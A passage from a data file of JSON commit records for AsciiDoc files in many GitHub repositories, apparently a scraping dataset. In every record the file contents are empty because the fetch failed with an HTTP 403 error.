\u6587\u6863\n","repos":"yiiu-co\/yiiu,liygheart\/jfinalbbs,yiiu-co\/yiiu,liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu,liygheart\/jfinalbbs,liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu,liygheart\/jfinalbbs,yiiu-co\/yiiu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liygheart\/jfinalbbs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04155bd62e561468f86d95302d38668d4f2bcc6b","subject":"[README] Fixing Maven URL.","message":"[README] Fixing Maven URL.","repos":"gallandarakhneorg\/afc,tpiotrow\/afc,DevFactory\/afc,gallandarakhneorg\/afc,tpiotrow\/afc,gallandarakhneorg\/afc,tpiotrow\/afc,DevFactory\/afc,DevFactory\/afc,tpiotrow\/afc,gallandarakhneorg\/afc,DevFactory\/afc,gallandarakhneorg\/afc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tpiotrow\/afc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b300a40414e56440333361d0a185752ab738a2b","subject":"Update 2016-01-12-new.adoc","message":"Update 2016-01-12-new.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-12-new.adoc","new_file":"_posts\/2016-01-12-new.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7cab56a33ee3d9516ec214e105037cfb8571362","subject":"Update 2015-11-18-Generar-y-utilizar-llaves-SSH.adoc","message":"Update 2015-11-18-Generar-y-utilizar-llaves-SSH.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-18-Generar-y-utilizar-llaves-SSH.adoc","new_file":"_posts\/2015-11-18-Generar-y-utilizar-llaves-SSH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c91a1fa8c9f46018878e450b14c2942a13674d03","subject":"Accept CIP2016-01-26-mandatory-match","message":"Accept CIP2016-01-26-mandatory-match\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2016-01-26-mandatory-match.adoc","new_file":"cip\/1.accepted\/CIP2016-01-26-mandatory-match.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d579a7febe7175e7b390452e51a39eb503facafc","subject":"Update 2016-6-28-PHPER-authority-control-RBAC.adoc","message":"Update 2016-6-28-PHPER-authority-control-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-28-PHPER-authority-control-RBAC.adoc","new_file":"_posts\/2016-6-28-PHPER-authority-control-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2798da50184ac5c35f69cb44b6362e9cdcc6621","subject":"Plan SITN","message":"Plan SITN\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Divers\/SITN.adoc","new_file":"Divers\/SITN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b0660c23241b9765510454a4e90b2203d8f7c30","subject":"Update 2015-08-11-Un-peu-de-pratique.adoc","message":"Update 2015-08-11-Un-peu-de-pratique.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-08-11-Un-peu-de-pratique.adoc","new_file":"_posts\/2015-08-11-Un-peu-de-pratique.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8f14c95bbd2ec87401ec2ef0696d413df10e574","subject":"Create subversion.adoc","message":"Create subversion.adoc","repos":"swehacker\/cheatsheets,swehacker\/cheatsheets","old_file":"drafts\/subversion.adoc","new_file":"drafts\/subversion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/swehacker\/cheatsheets.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff829545d17c36bdc6b0bca384212977eeaa8ae8","subject":"y2b create post GDC Money Clip + Secret Blade","message":"y2b create post GDC Money Clip + Secret Blade","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-24-GDC-Money-Clip--Secret-Blade.adoc","new_file":"_posts\/2014-03-24-GDC-Money-Clip--Secret-Blade.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"944d99984f3e1c5c17df6634160b67d545ee27d1","subject":"Create do-accessible-es.adoc","message":"Create do-accessible-es.adoc\n\nSpanish translation for do-accessible.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-accessible-es.adoc","new_file":"src\/do\/do-accessible-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b542ffafa9038d02b32d3be804f388d5f4b92634","subject":"Update 2017-01-21-Duvarlik-Dert.adoc","message":"Update 2017-01-21-Duvarlik-Dert.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-01-21-Duvarlik-Dert.adoc","new_file":"_posts\/2017-01-21-Duvarlik-Dert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c361ebfa18b42f0caafe8e829c6f5f9c3388b27","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f7b4bad1abd05884d669f3410f959b02546f1a5","subject":"Fix typo (thanks to Takugo-san)","message":"Fix typo (thanks to Takugo-san)\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website","old_file":"localized\/de\/index.adoc","new_file":"localized\/de\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fa6a657820eb219a0e0b264a914906eaf7a3e3a","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"393734009b6e2f0078d55a9820292e6a0ac87813","subject":"Update 2016-03-29-Ingenieria-social-S-E.adoc","message":"Update 2016-03-29-Ingenieria-social-S-E.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70dea4b52f5b526ec601c7ad634aebc649f825e1","subject":"Update 2016-07-15-Sistemas-inteligentes.adoc","message":"Update 2016-07-15-Sistemas-inteligentes.adoc","repos":"christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io","old_file":"_posts\/2016-07-15-Sistemas-inteligentes.adoc","new_file":"_posts\/2016-07-15-Sistemas-inteligentes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/christianmtr\/christianmtr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae4ecc2e37b2942504cb576839e03f32a2832b87","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32300742fcd9413677fe6404ebdb59240830b6ac","subject":"Update 2016-08-16-Simple-j-Query-character-countdown-in-textarea.adoc","message":"Update 2016-08-16-Simple-j-Query-character-countdown-in-textarea.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2016-08-16-Simple-j-Query-character-countdown-in-textarea.adoc","new_file":"_posts\/2016-08-16-Simple-j-Query-character-countdown-in-textarea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"062be23fa5da2ccfee286d836aa3d64f327e4a06","subject":"Updates 6.0.0-beta1 release notes","message":"Updates 6.0.0-beta1 release notes\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elasticassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,vroyer\/elasticassandra,strapdata\/elassandra","old_file":"docs\/reference\/release-notes\/6.0.0-beta1.asciidoc","new_file":"docs\/reference\/release-notes\/6.0.0-beta1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d4388fcd3dfb7e6aec8a5b108f1cd2fa4f837f4","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b132ace5722a2dc6f8ea6d4699e9d376c9710202","subject":"List of actual ticket selling companies","message":"List of actual ticket selling companies\n","repos":"LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava","old_file":"src\/main\/webapp\/realticketsales.adoc","new_file":"src\/main\/webapp\/realticketsales.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTree\/TicketManorJava.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"902e8da8c49034ff5df51d821991e0b084edd082","subject":"Update 2017-05-22-Quao-facil-e-criar-um-plugin-para-Native-Script.adoc","message":"Update 2017-05-22-Quao-facil-e-criar-um-plugin-para-Native-Script.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-05-22-Quao-facil-e-criar-um-plugin-para-Native-Script.adoc","new_file":"_posts\/2017-05-22-Quao-facil-e-criar-um-plugin-para-Native-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b7d00ac920051f99c2c36c9de41492be3f11e33","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f2c4ce8c84718a67b95577f16f2b99e0fd0cae3","subject":"Update 2016-03-18-Watch-IllumiNations-live-on-Monday-night.adoc","message":"Update 2016-03-18-Watch-IllumiNations-live-on-Monday-night.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-18-Watch-IllumiNations-live-on-Monday-night.adoc","new_file":"_posts\/2016-03-18-Watch-IllumiNations-live-on-Monday-night.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7244c39ca7b544d91b793c202dc5a3239ede0b4","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94316d1d95a46328d7441fdba35c7a347776f33f","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f41a908508cf5ae385fc1973e46e77daddbe1e27","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3519f19fb5a7d8c427ce7264c837a68a9b46b531","subject":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c0514800aec0e452124dd9ac85b234230b6496d","subject":"Update 2016-06-22-DIY-security-camera-abstract.adoc","message":"Update 2016-06-22-DIY-security-camera-abstract.adoc","repos":"porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io","old_file":"_posts\/2016-06-22-DIY-security-camera-abstract.adoc","new_file":"_posts\/2016-06-22-DIY-security-camera-abstract.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/porolakka\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeaa0fca14f8811b0732c1777b1a13ecadca1393","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"825f6fec7e7582ba4ed3443803174f040c95f733","subject":"y2b create post A Very Strange Smartphone...","message":"y2b create post A Very Strange Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-30-A-Very-Strange-Smartphone.adoc","new_file":"_posts\/2016-03-30-A-Very-Strange-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88701967b8b59959e1652e8e24140b35b6dd6d7f","subject":"Update 2018-04-25-High-throughput-Consensus.adoc","message":"Update 2018-04-25-High-throughput-Consensus.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-25-High-throughput-Consensus.adoc","new_file":"_posts\/2018-04-25-High-throughput-Consensus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d29eaed453377b2d1531ed75fab1f630ff9eb566","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59a102d60beb4462b29705547ea64f1a49a100cb","subject":"y2b create post Xbox One Titanfall Bundle + Gran Turismo 6 - #Deals","message":"y2b create post Xbox One Titanfall Bundle + Gran Turismo 6 - #Deals","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-24-Xbox-One-Titanfall-Bundle--Gran-Turismo-6--Deals.adoc","new_file":"_posts\/2014-02-24-Xbox-One-Titanfall-Bundle--Gran-Turismo-6--Deals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7939f667e19418e323dcb4e375aacb6fa1c93768","subject":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","message":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a732bdc118cc34e1935f3ca4d7f08f9a51e7b67","subject":"y2b create post Unboxing Every Air Jordan Sneaker","message":"y2b create post Unboxing Every Air Jordan Sneaker","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-11-Unboxing-Every-Air-Jordan-Sneaker.adoc","new_file":"_posts\/2017-06-11-Unboxing-Every-Air-Jordan-Sneaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e75af6c9e274d3a058cda836f6770ec84133f67b","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86166dfbe3e26498657d166730f8ed4249d7c8f8","subject":"Create READMY.adoc","message":"Create READMY.adoc","repos":"DmitryKubahov\/VESB","old_file":"collections\/READMY.adoc","new_file":"collections\/READMY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DmitryKubahov\/VESB.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1aa62f89e968c3c504ae69b8ba7d25a658c16b03","subject":"Added Avro Dataformat to Gitbook","message":"Added Avro Dataformat to Gitbook\n","repos":"adessaigne\/camel,NickCis\/camel,acartapanis\/camel,tlehoux\/camel,Thopap\/camel,YoshikiHigo\/camel,zregvart\/camel,sverkera\/camel,Fabryprog\/camel,lburgazzoli\/camel,ssharma\/camel,YoshikiHigo\/camel,sabre1041\/camel,alvinkwekel\/camel,nboukhed\/camel,snurmine\/camel,scranton\/camel,pkletsko\/camel,isavin\/camel,yuruki\/camel,dmvolod\/camel,NickCis\/camel,sirlatrom\/camel,lburgazzoli\/apache-camel,christophd\/camel,snurmine\/camel,bhaveshdt\/camel,ssharma\/camel,hqstevenson\/camel,isavin\/camel,yuruki\/camel,NickCis\/camel,jonmcewen\/camel,CodeSmell\/camel,rmarting\/camel,davidkarlsen\/camel,anton-k11\/camel,jkorab\/camel,gilfernandes\/camel,acartapanis\/camel,sabre1041\/camel,sverkera\/camel,allancth\/camel,rmarting\/camel,anoordover\/camel,davidkarlsen\/camel,cunningt\/camel,sabre1041\/camel,sverkera\/camel,objectiser\/camel,lburgazzoli\/camel,scranton\/camel,nboukhed\/camel,anoordover\/camel,chirino\/camel,nboukhed\/camel,RohanHart\/camel,Fabryprog\/camel,Thopap\/camel,NickCis\/camel,neoramon\/camel,bgaudaen\/camel,gnodet\/camel,YoshikiHigo\/camel,RohanHart\/camel,nicolaferraro\/camel,mgyongyosi\/camel,jkorab\/camel,ssharma\/camel,hqstevenson\/camel,drsquidop\/camel,isavin\/camel,Thopap\/camel,tadayosi\/camel,mcollovati\/camel,allancth\/camel,mgyongyosi\/camel,salikjan\/camel,jamesnetherton\/camel,hqstevenson\/camel,onders86\/camel,tadayosi\/camel,DariusX\/camel,jarst\/camel,kevinearls\/camel,onders86\/camel,pkletsko\/camel,cunningt\/camel,mgyongyosi\/camel,gnodet\/camel,hqstevenson\/camel,pkletsko\/camel,tdiesler\/camel,gautric\/camel,JYBESSON\/camel,driseley\/camel,gnodet\/camel,akhettar\/camel,pmoerenhout\/camel,lburgazzoli\/apache-camel,tkopczynski\/camel,veithen\/camel,tlehoux\/camel,kevinearls\/camel,yuruki\/camel,veithen\/camel,jarst\/camel,w4tson\/camel,acartapanis\/camel,apache\/camel,YoshikiHigo\/camel,pkletsko\/camel,prashant2402\/camel,allancth\/camel,sverkera\/camel,lburgazzoli\/apache-camel,jkorab\/camel,anoordover\/camel,driseley\/camel,isavin\/camel,drsquidop\/camel,Thopap\/camel,adessaigne\/camel,nikhilvibhav\/camel,Thopap\/camel,YoshikiHigo\/camel,pmoerenhout\/camel,sabre1041\/camel,akhettar\/camel,nboukhed\/camel,prashant2402\/camel,sverkera\/camel,anton-k11\/camel,snurmine\/camel,veithen\/camel,driseley\/camel,onders86\/camel,veithen\/camel,bgaudaen\/camel,CodeSmell\/camel,dmvolod\/camel,pkletsko\/camel,kevinearls\/camel,akhettar\/camel,isavin\/camel,sverkera\/camel,anton-k11\/camel,adessaigne\/camel,ullgren\/camel,jamesnetherton\/camel,hqstevenson\/camel,apache\/camel,curso007\/camel,tkopczynski\/camel,salikjan\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,curso007\/camel,pax95\/camel,akhettar\/camel,nicolaferraro\/camel,acartapanis\/camel,nikhilvibhav\/camel,rmarting\/camel,apache\/camel,bgaudaen\/camel,zregvart\/camel,drsquidop\/camel,drsquidop\/camel,sirlatrom\/camel,tadayosi\/camel,anoordover\/camel,RohanHart\/camel,acartapanis\/camel,alvinkwekel\/camel,bhaveshdt\/camel,curso007\/camel,scranton\/camel,yuruki\/camel,tlehoux\/camel,christophd\/camel,jkorab\/camel,allancth\/camel,gnodet\/camel,chirino\/camel,jonmcewen\/camel,Fabryprog\/camel,lburgazzoli\/apache-camel,jarst\/camel,jonmcewen\/camel,driseley\/camel,gautric\/camel,lburgazzoli\/camel,DariusX\/camel,w4tson\/camel,JYBESSON\/camel,scranton\/camel,tdiesler\/camel,punkhorn\/camel-upstream,cunningt\/camel,christophd\/camel,allancth\/camel,RohanHart\/camel,w4tson\/camel,DariusX\/camel,bhaveshdt\/camel,jamesnetherton\